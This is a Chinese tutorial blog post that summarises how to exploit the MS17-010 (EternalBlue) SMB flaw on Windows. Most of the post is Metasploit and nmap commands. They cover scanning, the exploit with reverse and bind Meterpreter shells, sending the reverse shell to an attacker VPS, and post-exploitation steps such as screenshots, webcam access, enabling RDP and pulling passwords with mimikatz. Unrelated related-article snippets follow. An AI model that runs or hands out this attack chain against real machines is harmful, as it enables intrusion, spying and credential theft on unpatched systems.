1. 全栈程序员必看首页

MS17010漏洞利用总结

全栈程序员-站长 未分类 阅读 92

MS17010漏洞利用总结0x01常规打法扫描是否存在ms17-010漏洞:nmap-n-p445–scriptsmb-vuln-ms17-010192.168.1.0/24–openMSF常规漏洞利用:msf>useexploit/windows/smb/ms17_010_eternalbluemsf>setrhost192.168.1.112反向打:msf>setpayloadwindows/x64/meterpreter/reverse_tcpm

大家好,又见面了,我是你们的朋友全栈君。

0x01 常规打法

扫描是否存在ms17-010漏洞

nmap -n -p445 --script smb-vuln-ms17-010 192.168.1.0/24 --open

MSF常规漏洞利用:

msf > use exploit/windows/smb/ms17_010_eternalblue 
msf > set rhost 192.168.1.112 
反向打:
msf > set payload windows/x64/meterpreter/reverse_tcp 
msf > set lhost 192.168.1.118
正向打:
msf > set payload windows/x64/meterpreter/bind_tcp

常用功能:

桌面抓图 
meterpreter > screenshot
视频开启 
meterpreter > webcam_scream
开启远程桌面 
meterpreter > run post/windows/manage/enable_rdp 
目标密码破解
第一步:载入mimikatz
meterpreter > load mimikatz
第二步:使用命令wdigest获取密码
meterpreter >wdigest

0x02 反弹到VPS稳定打法

(常规打不好使的情况下。)

1.环境
vps 140.x.x.x
目标 192.168.3.123
本地kali 192.168.3.62

2.vps开启监听。

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 443
exploit -j -z

在这里插入图片描述
3.kali下开始攻击。

use exploit/windows/smb/ms17_010_eternalblue
set rhost 192.168.3.123
set payload windows/x64/meterpreter/reverse_tcp
set lhost 140.x.x.x  #反弹到vps
set lport 443

在这里插入图片描述
run到下图界面Ctrl+C
在这里插入图片描述
4.vps收到meterpreter。(如果不稳定就多打几次)
在这里插入图片描述

0x03 目标为Win2003情况下稳定打

方法一(命令执行)

msf5 > use auxiliary/admin/smb/ms17_010_command
msf5 > set command whoami
msf5 > set rhosts x.x.x.x

在这里插入图片描述
方法二(返回meterpreter)
在这里插入图片描述

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/131363.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长
0 0


相关推荐

  • 用C#制作计算器_基于c51简易计算器设计

    用C#制作计算器_基于c51简易计算器设计

    用C#制作计算器_基于c51简易计算器设计在一些问题中有时会用到计算器,今天我们可以用C#做一个简易的计算器用到的开发工具为VisualStudio2019(我用的是2019,其他版本的也可以)1.首先新建一个项目文件.2.在Form1.cs文件(Winform框架基础文件)中添加所用到的控件.3.添加TextBox和ComboBox以及Button控件4.对Button以及ComboBox进行一些简单的设置……

    全栈程序员-站长的头像 全栈程序员-站长
    2025年10月12日
    7
  • Linux内核版本查看_mysql隐藏版本号

    Linux内核版本查看_mysql隐藏版本号

    Linux内核版本查看_mysql隐藏版本号1、使用uname命令查找Linux内核2、使用/proc/version文件查找Linux内核3、使用dmesg命令查找Linux内核版本4、使用hostnamectl命令查看Linux内核版本

    全栈程序员-站长的头像 全栈程序员-站长
    2022年10月13日
    1
  • MATLAB绘制xyz的分段函数,matlab绘制分段函数「建议收藏」

    MATLAB绘制xyz的分段函数,matlab绘制分段函数「建议收藏」

    MATLAB绘制xyz的分段函数,matlab绘制分段函数「建议收藏」几何画板中如何用一个解析式画分段函数的图像_数学_自然科学_专业资料。几何画板中如何用一个解析式画分段函数的图像几何画板中如何用一个解析式画分段函数的……Matlab绘图强大的绘图功能是Matlab的特点之一,Matlab提供了一系列的绘图函数,用户不需要过多的考虑绘图的细节,只需要给出一些基本参数就能得到所需图形,这……(k3+1:k4-1),’m’)hold…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年6月10日
    33
  • webdriver下载

    webdriver下载

    webdriver下载chrome浏览器驱动下载地址:http://chromedriver.storage.proxy.ustclug.org/index.htmlchrome版本在80后的chrome版本和chromedriver版本对应firefox浏览器驱动下载地址:https://github.com/mozilla/geckodriver/releasesie浏览器驱动下载地址:http://selenium-release.storage.proxy.ustclug.org/index.htmlIEDriv

    全栈程序员-站长的头像 全栈程序员-站长
    2026年1月28日
    5
  • bigdecimal保留2位小数_java如何保留一位小数

    bigdecimal保留2位小数_java如何保留一位小数

    bigdecimal保留2位小数_java如何保留一位小数http://blog.csdn.net/yuhua3272004/article/details/3075436使用java.math.BigDecimal工具类实现java保留两位小数问题:方式一(四舍五入形式保留两位小数,注意模式ROUND_HALF_UP):四舍五入doublef=111231.5585;BigDecimal…

    全栈程序员-站长的头像 全栈程序员-站长
    2022年9月23日
    2
  • html2canvas, JsPDF生成pdf

    html2canvas, JsPDF生成pdf

    html2canvas, JsPDF生成pdf创建 pdf js 引入依赖 importVuefro vue importhtml2c html2canvas importJsPDFf jspdf constPDF PDF install function Vue options targetDom 需要打印的 dom 对象 name pdf 的名字 callback 回调函数 Vue prototype create

    全栈程序员-站长的头像 全栈程序员-站长
    2025年7月12日
    5

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号